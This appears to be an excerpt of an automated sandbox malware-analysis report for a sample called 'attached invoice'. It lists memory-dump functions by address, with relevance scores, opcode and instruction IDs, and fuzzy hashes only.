                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5d9358941e4357be30426f8328315742b7afa3067abfd7a35e635d612a2c1331
                                                                                                    • Instruction ID: 46bbaec945970158110c96af17568fc874707931a13dedf46cc6689df6d31bf3
                                                                                                    • Opcode Fuzzy Hash: 5d9358941e4357be30426f8328315742b7afa3067abfd7a35e635d612a2c1331
                                                                                                    • Instruction Fuzzy Hash: 0BE18E706083428FC715CF28C094A6ABBE1FF99318F148A6DF599C7351EB31EA05CB92
                                                                                                    Function 018D8347 Relevance: .4, Instructions: 380COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6a3216627a29319ab27eacbf2af170820a01e07e0e13cd595f5328a6c771da4d
                                                                                                    • Instruction ID: 09472f240b561fcd71f68fc0ca9761643dddad68f5fdab5bb28f6d13927ff1f8
                                                                                                    • Opcode Fuzzy Hash: 6a3216627a29319ab27eacbf2af170820a01e07e0e13cd595f5328a6c771da4d
                                                                                                    • Instruction Fuzzy Hash: CBD10171A0031A9BDB14DF68C880BBE77B5FF95718F09412DE91ADB280EB34EA55CB50
                                                                                                    Function 019769B0 Relevance: .4, Instructions: 379COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0183c1592b8743f3a0d2bba7ca38ed50624f1a8355763df07a2de1ade2b27934
                                                                                                    • Instruction ID: 9e1a2312b6f1f76b396a2737e39bc91988e99d22fb97f77e06a653f73b778d5d
                                                                                                    • Opcode Fuzzy Hash: 0183c1592b8743f3a0d2bba7ca38ed50624f1a8355763df07a2de1ade2b27934
                                                                                                    • Instruction Fuzzy Hash: 09E16F70D0065A9FEF15CFA8C990AEEBBF5BF49305F188059E948E7241E335D981CBA0
                                                                                                    Function 018F0445 Relevance: .3, Instructions: 300COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                    • Instruction ID: 38d9e0d80d2ecef6a525d60bb12f9e107c73256e54832144051dd2dd3b816d06
                                                                                                    • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                    • Instruction Fuzzy Hash: 2BB1F73160464A9FDB25CBA8C890FBEBBFABF84304F140559E656DB282D734EE41CB50
                                                                                                    Function 01900D01 Relevance: .3, Instructions: 295COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4f0d58ced1dd9a3e2b984ceddf11df1e3d42528267bb1c6749f3970f60461070
                                                                                                    • Instruction ID: df625a0cb3e558f9791237b9acd22452e2b6fcd65096911ec1c7d8992a774dff
                                                                                                    • Opcode Fuzzy Hash: 4f0d58ced1dd9a3e2b984ceddf11df1e3d42528267bb1c6749f3970f60461070
                                                                                                    • Instruction Fuzzy Hash: 1DC12C70E04309DFDB25DFA9C884FADBBB9FF89344F144529E50AAB285D770A941CB50
                                                                                                    Function 018E82E0 Relevance: .3, Instructions: 281COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d7de7e87287638392f3f61c832083503209c8bcb102299fa3063126602244203
                                                                                                    • Instruction ID: 185dc4118fbe8375e50b7cb56a1060939ff0993e4c3d05ac437645e3ccef51fe
                                                                                                    • Opcode Fuzzy Hash: d7de7e87287638392f3f61c832083503209c8bcb102299fa3063126602244203
                                                                                                    • Instruction Fuzzy Hash: ECC147746083418FE764CF19C494BAAB7E4FF89308F44496DE989C7291E774EA48CF92
                                                                                                    Function 018DC3C7 Relevance: .3, Instructions: 280COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 15ae988ab5c41a762fdf38ebb6e6f6bce2b198f79423c75f08c2f59da0eed24b
                                                                                                    • Instruction ID: eacd77e17654b925422e868be0c9980da09ba11005ca57b93e690ebf4e918c91
                                                                                                    • Opcode Fuzzy Hash: 15ae988ab5c41a762fdf38ebb6e6f6bce2b198f79423c75f08c2f59da0eed24b
                                                                                                    • Instruction Fuzzy Hash: 0DB16170A002698BDB74DF59C890BA9B7B5BF84704F0485EDE50EE7281DB709E85CB21
                                                                                                    Function 0190E507 Relevance: .3, Instructions: 278COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bf360de50fb6ecd1ab50467e0a683c695f8ef20a610c076c451acf3b999c0b35
                                                                                                    • Instruction ID: 5444b30437ef09bd4977616da0e6bc11273d74628711f9e800f3ad02ca8df08f
                                                                                                    • Opcode Fuzzy Hash: bf360de50fb6ecd1ab50467e0a683c695f8ef20a610c076c451acf3b999c0b35
                                                                                                    • Instruction Fuzzy Hash: F6A13B31E0021A9FEF22DB9CC948FADBBB8AF44714F050955EA19AB2D1E7749D40CBD1
                                                                                                    Function 019200A5 Relevance: .3, Instructions: 276COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8943b35fda9e290299706f1d23cd0124de250342e6dd988114fc286cdfabbe98
                                                                                                    • Instruction ID: 2ee8f484cacb4ba9875019c186f98bdfdc16fa61764db0b5fbc1fc180eb5a315
                                                                                                    • Opcode Fuzzy Hash: 8943b35fda9e290299706f1d23cd0124de250342e6dd988114fc286cdfabbe98
                                                                                                    • Instruction Fuzzy Hash: 38A1C270B01626DFEB25DF69C980BAABBB5FF54315F144029E90DE7285DB34A815CB80
                                                                                                    Function 019B4080 Relevance: .3, Instructions: 275COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c05052809cf2618677118060cd6e39407532535abe94d428145a73ee289f3968
                                                                                                    • Instruction ID: a2fdfaf3381bfbae16d9e5dfb59c66ece1f3323da99a622cb242e0520c71ee74
                                                                                                    • Opcode Fuzzy Hash: c05052809cf2618677118060cd6e39407532535abe94d428145a73ee289f3968
                                                                                                    • Instruction Fuzzy Hash: BBA1D1726056129FC721DF18CA80BAAB7E9FF58704F44092CE68ADB652C334ED51DB92
                                                                                                    Function 018FE310 Relevance: .3, Instructions: 261COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0f40f3ec855b9be4a671a8eeb8ae006b7e163de457f4bbe67b5a94e82d263ac2
                                                                                                    • Instruction ID: 720d0e2c7c75439840ec86e37a48ff575398b8921ac0eda154b5a6ba9b940317
                                                                                                    • Opcode Fuzzy Hash: 0f40f3ec855b9be4a671a8eeb8ae006b7e163de457f4bbe67b5a94e82d263ac2
                                                                                                    • Instruction Fuzzy Hash: 74912531A00A15CBE720DF6DC484F7ABBA5EF98718F06406DEB09DB3A0D634DA41C762
                                                                                                    Function 0193693A Relevance: .2, Instructions: 226COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e8ae28f05914b9655ee3463cfe34b90e804298c5374bbf965e4a4c68b5b0dc55
                                                                                                    • Instruction ID: 110cd7e743b73c85d38ee14a726e14bee19c491d4c66b2af486d96381f6f39fa
                                                                                                    • Opcode Fuzzy Hash: e8ae28f05914b9655ee3463cfe34b90e804298c5374bbf965e4a4c68b5b0dc55
                                                                                                    • Instruction Fuzzy Hash: 3E819771A00616AFDB19CF69D880ABEBBF9FF88700F04852EE559D7640D734DA41CB64
                                                                                                    Function 019AA6C0 Relevance: .2, Instructions: 222COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                                    • Instruction ID: ee0c69ad4de45d2ffd3a65f452c70087ee964896c82fe5ade80c08d35daef6f8
                                                                                                    • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                                    • Instruction Fuzzy Hash: 19818175A002069FDF19CF99C480AAEBBF6BFC4310F598569D91A9B344D734DD0ACB90
                                                                                                    Function 0191E1A4 Relevance: .2, Instructions: 212COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c2a4ca8ee124c3b36fe6176f8f506f56ae4ab13f669fe2ce7b9728aa1b99a782
                                                                                                    • Instruction ID: f80373d7329db74c6353ca5598f4f49390b747b4e176100ffea74ce2fc1501b2
                                                                                                    • Opcode Fuzzy Hash: c2a4ca8ee124c3b36fe6176f8f506f56ae4ab13f669fe2ce7b9728aa1b99a782
                                                                                                    • Instruction Fuzzy Hash: 8F817271A0060DAFDB12DFA9C890BEEB7F9FF88350F144829E95AA7214D730AD45DB50
                                                                                                    Function 018FC560 Relevance: .2, Instructions: 206COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: df94bafd9d53a66bb5037f41cf0feffebeb1b052e124ab99033acfbd5fe3af63
                                                                                                    • Instruction ID: e704f235d5921e231d7650a73fce468ea12c2ae560e04126f8a66951b9c2380d
                                                                                                    • Opcode Fuzzy Hash: df94bafd9d53a66bb5037f41cf0feffebeb1b052e124ab99033acfbd5fe3af63
                                                                                                    • Instruction Fuzzy Hash: 1C71BDB5C096299FCB258F99C890BBEBBB4FF49711F14412EE946A7340D7349A40CBA4
                                                                                                    Function 019788FB Relevance: .2, Instructions: 206COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 93dd9e6c16ce38349b3d5c107c4f401f6361ab7970bd58b0840ccebe45f96748
                                                                                                    • Instruction ID: 813bdbc13a5f7282297030fbcdfa489204f7284939b3682df49ba3795412a2e8
                                                                                                    • Opcode Fuzzy Hash: 93dd9e6c16ce38349b3d5c107c4f401f6361ab7970bd58b0840ccebe45f96748
                                                                                                    • Instruction Fuzzy Hash: 1571E074A04266AFCB15DF59C444ABEBBF5EF45301F08846AE998DB301E334EA46C7A1
                                                                                                    Function 018F252B Relevance: .2, Instructions: 201COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b62f321c083b3abcdded9e3c47fe0a371af9f2bc3c8e614ef69b1bf81245af4d
                                                                                                    • Instruction ID: 73cf9461ed268e60e46aa1b7c29912bffee9147d11df5d01ab04185248a996fa
                                                                                                    • Opcode Fuzzy Hash: b62f321c083b3abcdded9e3c47fe0a371af9f2bc3c8e614ef69b1bf81245af4d
                                                                                                    • Instruction Fuzzy Hash: FA71CF716046428FD711DF2CC894B26B7E6FF88704F0485A9F959CB352DB38DA45CBA2
                                                                                                    Function 018E89C0 Relevance: .2, Instructions: 197COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3a5915d6aeb289ccafa51a585b7f615a97d41ab9f004f1db905adb7d16d44970
                                                                                                    • Instruction ID: df6a9fdc3be3a87408140f3de4dc0e462bac5d2d4859220732d257592258739e
                                                                                                    • Opcode Fuzzy Hash: 3a5915d6aeb289ccafa51a585b7f615a97d41ab9f004f1db905adb7d16d44970
                                                                                                    • Instruction Fuzzy Hash: 9D81B131A092068FDB24CF9CE588B6D77F6BF49314F154169EA04AB291D7749E40CF91
                                                                                                    Function 019A8BBE Relevance: .2, Instructions: 186COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6f8cd225611bf1032bf1038df653560b10e2ebdf5880e312fb03f713fe80f153
                                                                                                    • Instruction ID: 530672b50161f5137c18344415cbc0b007e3d49ae9d979fd33e0861186786945
                                                                                                    • Opcode Fuzzy Hash: 6f8cd225611bf1032bf1038df653560b10e2ebdf5880e312fb03f713fe80f153
                                                                                                    • Instruction Fuzzy Hash: 9A61BC71600716AFD715DF29C884BABBBA9FF98711F408A19FA5D87240DB30E918CBD1
                                                                                                    Function 0190CD10 Relevance: .2, Instructions: 165COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
                                                                                                    • Instruction ID: 4429c44b0e7da339817318b6126249775b1b5d7130da59a15e10c503947dae52
                                                                                                    • Opcode Fuzzy Hash: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
                                                                                                    • Instruction Fuzzy Hash: B8516F75E0024ADFCF15CFACC580AEEBBB5FB88211F198569D919B7240D638AA41CB94
                                                                                                    Function 019A892E Relevance: .2, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a9239a238510afd049b025358349b60cad46a4b0e7bc50526846f103f74a445f
                                                                                                    • Instruction ID: 75f7f8c55edf300f1c2c4c54821094cca694739e1c8eb84960cb75e7eb3d8109
                                                                                                    • Opcode Fuzzy Hash: a9239a238510afd049b025358349b60cad46a4b0e7bc50526846f103f74a445f
                                                                                                    • Instruction Fuzzy Hash: 0251AD716047029FE716DF28C840BAAB7E9FF84356F448929F99997290D734E90CCBD2
                                                                                                    Function 0191E363 Relevance: .2, Instructions: 158COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0679f3d01783c45529c03bc25928ccd0da9e2a97e6f13eac9e03275eb4eca45d
                                                                                                    • Instruction ID: a1f8de02bf8a8a935f6a8f17daa24c455696a840f58f32382f0503d69eec8f77
                                                                                                    • Opcode Fuzzy Hash: 0679f3d01783c45529c03bc25928ccd0da9e2a97e6f13eac9e03275eb4eca45d
                                                                                                    • Instruction Fuzzy Hash: 23513071240609DFDB22DF68C990E6AB7FDFF14744F400829EA5AD76A0D734E981CB51
                                                                                                    Function 0190AD20 Relevance: .2, Instructions: 158COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0e5182a464c28648d00d46bda124c141606d33a65f9c3509e1367bf70d84f0e3
                                                                                                    • Instruction ID: f02ca85a023abcfc9beb126d5ca2200382afbe0da3e5f26a6a87f1ba9d0bae8a
                                                                                                    • Opcode Fuzzy Hash: 0e5182a464c28648d00d46bda124c141606d33a65f9c3509e1367bf70d84f0e3
                                                                                                    • Instruction Fuzzy Hash: 05510232A40705EFDB279F5CC850F6A77B9FF85B95F154868EA098B291C638ED00CB81
                                                                                                    Function 019044D1 Relevance: .2, Instructions: 156COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                                                                    • Instruction ID: 592ab48e2858b6d0c3e0be6caeacff63a98715453bd743bcbb7d0029543ed72f
                                                                                                    • Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                                                                    • Instruction Fuzzy Hash: 34516371E0021AAFDF16DF94C850FEEBBB9AF44714F054169EA09AB280E774D945CBA0
                                                                                                    Function 0196E660 Relevance: .2, Instructions: 154COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
                                                                                                    • Instruction ID: 0cfdb2366fa8bb536ff01902376a7f7e32ec9a0a01691a2d597501e12a964a4c
                                                                                                    • Opcode Fuzzy Hash: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
                                                                                                    • Instruction Fuzzy Hash: B751C839D0021AEFEF21DF94C884FAEBBBCAB40725F114665D519A7290D7749E40CBA1
                                                                                                    Function 019ACDEB Relevance: .2, Instructions: 153COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ed2207d77c0d6efe1081a5fabc97aed0849c69b708ff8aa42de684460e441ab5
                                                                                                    • Instruction ID: bdd501e7dc61a1cbd0194abc5efab6b374231e548b60e96fc07c094cc87456e5
                                                                                                    • Opcode Fuzzy Hash: ed2207d77c0d6efe1081a5fabc97aed0849c69b708ff8aa42de684460e441ab5
                                                                                                    • Instruction Fuzzy Hash: D0516B716083429FD711CF28C884B5ABBE9FFC8744F44892DF9999B240D734E949CB92
                                                                                                    Function 019A86A8 Relevance: .2, Instructions: 152COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a2772b9182b4685e169bca218db5dba4cf782925f76f4fa077dab994b8ed9cb3
                                                                                                    • Instruction ID: 737084e1e0f5a73f9b18f188008d9baf8be9d9e2ade7fa0bfac90533b099c6c2
                                                                                                    • Opcode Fuzzy Hash: a2772b9182b4685e169bca218db5dba4cf782925f76f4fa077dab994b8ed9cb3
                                                                                                    • Instruction Fuzzy Hash: F041F8717006119BEB25DA2DC894B7BBB9EFFD4663F848218E92D87280DB34D819C6D1
                                                                                                    Function 0196C870 Relevance: .1, Instructions: 148COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3abb4ccea4cf7f6612e9439479c872782d61598d99138812acbd97d1d0f8f573
                                                                                                    • Instruction ID: adb90120ca3ad3c30c058c33625b9d72b20d5fdf09d99b13208969778af6e015
                                                                                                    • Opcode Fuzzy Hash: 3abb4ccea4cf7f6612e9439479c872782d61598d99138812acbd97d1d0f8f573
                                                                                                    • Instruction Fuzzy Hash: 9D519C7290521ADFCB20DFACC480D9EB7BDFB58354B51452AE589A7305D730EE41CBA1
                                                                                                    Function 0191CB20 Relevance: .1, Instructions: 147COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f74517814f1d4c108df07b0cdb9f51137ccba7c843f230e3d844d3772251a462
                                                                                                    • Instruction ID: b04354eb8984ada1583f18515d1eec332034dcbf7b1c36e9a0e468a03b6cb97d
                                                                                                    • Opcode Fuzzy Hash: f74517814f1d4c108df07b0cdb9f51137ccba7c843f230e3d844d3772251a462
                                                                                                    • Instruction Fuzzy Hash: D351FA302C420FDBDF26CE1DC941A39B799FB81216F188829E90FDB14AD631D4C1EB52
                                                                                                    Function 0191A350 Relevance: .1, Instructions: 139COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e7c3e2de0917e7435964958861aa0a5bd15fc787953f74fd132550201557240f
                                                                                                    • Instruction ID: a83baf25fda728de36f1008e42226477eab8a1c1f6421c092a64423ed60e7b4f
                                                                                                    • Opcode Fuzzy Hash: e7c3e2de0917e7435964958861aa0a5bd15fc787953f74fd132550201557240f
